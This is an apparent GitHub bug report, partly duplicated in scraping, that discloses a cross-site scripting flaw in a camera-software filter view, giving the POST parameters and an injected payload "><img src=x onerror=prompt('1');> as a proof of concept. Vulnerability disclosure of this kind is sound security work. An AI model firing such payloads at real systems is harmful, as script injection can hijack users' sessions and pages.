Describe the bug
The view filter, insecurely displays the filter[Query][terms][0][val] parameter value, without applying any proper output filtration leading to XSS.
POST Data - executeButton=&action=&filter[AutoArchive]=1&filter[AutoDelete]=1&filter[AutoExecute]=1&filter[AutoExecuteCmd]=0&filter[AutoMove]=1&filter[AutoMoveTo]=1&filter[AutoVideo]=1&filter[B [limit]=100&filter[Query][sort_asc]=1&filter[Query][sort_field]=Id&filter[Query][terms][0][attr]=MonitorId&filter[Query][terms][0][op]==&filter[Query][terms][0] [val]="><img src=x onerror=prompt('1');>&filter[UpdateDiskSpace]=1&Id=&object=filter
Payload used - "><img src=x onerror=prompt('1');>
Navigate to the Affected URL, Payload would be triggered.
Expected behavior
Proper escaping of special characters.
Debug Logs
None
The text was updated successfully, but these errors were encountered:
Describe Your Environment
Describe the bug
The view
filter, insecurely displays thefilter[Query][terms][0][val]parameter value, without applying any proper output filtration leading to XSS.To Reproduce
Affected URL :
http://localhost/zm/?sort_asc=1&sort_field=StartTime&view=filter
POST Data -
executeButton=&action=&filter[AutoArchive]=1&filter[AutoDelete]=1&filter[AutoExecute]=1&filter[AutoExecuteCmd]=0&filter[AutoMove]=1&filter[AutoMoveTo]=1&filter[AutoVideo]=1&filter[B [limit]=100&filter[Query][sort_asc]=1&filter[Query][sort_field]=Id&filter[Query][terms][0][attr]=MonitorId&filter[Query][terms][0][op]==&filter[Query][terms][0] [val]="><img src=x onerror=prompt('1');>&filter[UpdateDiskSpace]=1&Id=&object=filterPayload used -
"><img src=x onerror=prompt('1');>Expected behavior
Debug Logs
The text was updated successfully, but these errors were encountered: